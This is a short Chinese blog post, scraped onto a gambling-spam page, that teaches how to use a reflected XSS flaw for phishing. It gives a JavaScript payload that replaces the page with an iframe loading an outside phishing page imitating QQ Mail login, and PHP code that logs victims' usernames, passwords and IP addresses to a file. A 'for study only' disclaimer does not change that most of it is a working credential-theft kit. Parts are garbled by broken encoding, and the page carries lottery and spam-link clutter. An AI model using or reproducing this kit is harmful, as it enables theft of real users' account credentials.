盈讯足球比分网|华体足球比分直播|
关注我们
QRcode 邮件联系 QRcode

利用XSS漏洞进行钓鱼的方法

 feng  8,479 ℃  3条点评

文章内容比较简单,但可以造成不可想象的后果,禁止用于非法钓鱼,否则,后果自负。

1,讲到钓鱼,先得有xss的地方
xss代码如下
top.document.body.innerHTML="<iframe?width=100%?height=100%?frameborder=0?scrolling=no?style=position:absolute;left:0;top:0?src=http://xj.hk/qq.php?qqnum=10010></iframe>";<br />
其中top.document.body.innerHTML=的意思是清空当前HTML的所有代码,并注入以下代码
简单的说,就是把当前HTML全部重写了、

这样就有一个好处,当前所在的网址不变,而页面被我们替换掉了。

我们用一个iframe 框架来重写整个页面

例子中?#25925;?#30340;是我的一个QQmail的钓鱼页面

2,剩下的就?#20405;?#20316;钓鱼页面了,就是如何制作你自己的
http://xj.hk/qq.php?qqnum=10010<br />
就拿我这个qq.php做例子,钓鱼页面你得把页面做的跟目标登录页面一抹一样,你可以直接另存为别人的网页,就可以了,让别人输入帐号和密码。但是我得接收数据呀。
<?php<br /> date_default_timezone_set('PRC');<br /> if(@$_GET['u']!=""?&&[email protected]$_GET['p']!=""){???????//得到接收的U,和P?就是页面表单中的帐号密码<br /> $fp=fopen("1.txt",?"at");?????????????????????????????????//写入1.txt记录<br /> fputs($fp,?"TIME:?".date("Y/m/d?H:i:s")."??USER:?"[email protected]$_GET['u']."??PASSWORD:?"[email protected]$_GET['p']."??IP:?".$_SERVER['REMOTE_ADDR
']."\n");<br /> fclose($fp);<br /> header("location:http://mail.qq.com");??//提交之后返回<br /> exit;<br /> }<br /> ?><br /> //下面的登录页面的HTML代码,我就省略了,直接贴表单<br /> <form?action="qq.php"?method="GET"><br /> <table?cellpadding="0"?cellspacing="0"><br /> <tr><br /> <td><input?type="text"?name="u"?class="login_name1"?value="& lt;?php?echo?$_GET['qqnum'];?>"?/></td>??//对应接收的U<br /> <td><input?type="button"?name="submit"?value=""?class="username_bon"?/></td><br /> </tr><br /> </table>

<div?class="login_pass">< input?type="password"?name="p"?class="login_pass1"?/></div>??// 对应接收的P
<div?class="pass_jizhu">
<div?class="pass_check">
<table?cellpadding="0"?cellspacing="0">
<tr>
<td?style="?padding-right:5px;"><input?type="checkbox"?name="cheack"?/></td>
<td>记住登录状态</td>

 

好了,这样,一个钓鱼页面就完成了。是不是很简单呢?
这样访?#25910;?#35775;问的话,URL还是原来的,可是内容变成了我们的,这样的话,就算是一个反射型的xss。

再说一下:仅供学习使用,禁止非法用?#23613;?/p>

本文标签:
ubnt网桥54M CMCC配置文件
清空删除web文件夹下的所有文件
微营销之微信营销可以做什么?微营销之微信营销可以做什么?emlog博客SEO网站设置方法emlog博客SEO网站设置方法网站建设中站长最容易忽略的三个问题网站建设中站长最容易忽略的三个问题百度站长工具可能发布网站异常行为提醒功能百度站长工具可能发布网站异常行为提醒功能

已有3条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

  1. #3 苹果电视棒

    分析的很透彻,很欣赏你的看法,学习了。

    2012-11-17 上午 12:06回复
  2. #2 天天?#24049;?/strong>

    天天?#24049;?#20813;费?#31456;?#21508;种网站,无需友链,即可?#31456;迹?/p> 2012-11-17 上午 9:55回复


盈讯足球比分网
2019年36码特围表 全天飞艇最精准2期计划 双色球杀红球100%杀号 杀号码无错 江西时时分析工具 腾讯分分彩稳赚不赔技巧 公式单双怎么算大发快三 双色球基本技巧 彩神幸运飞艇平刷冠军 双色球专家杀号定胆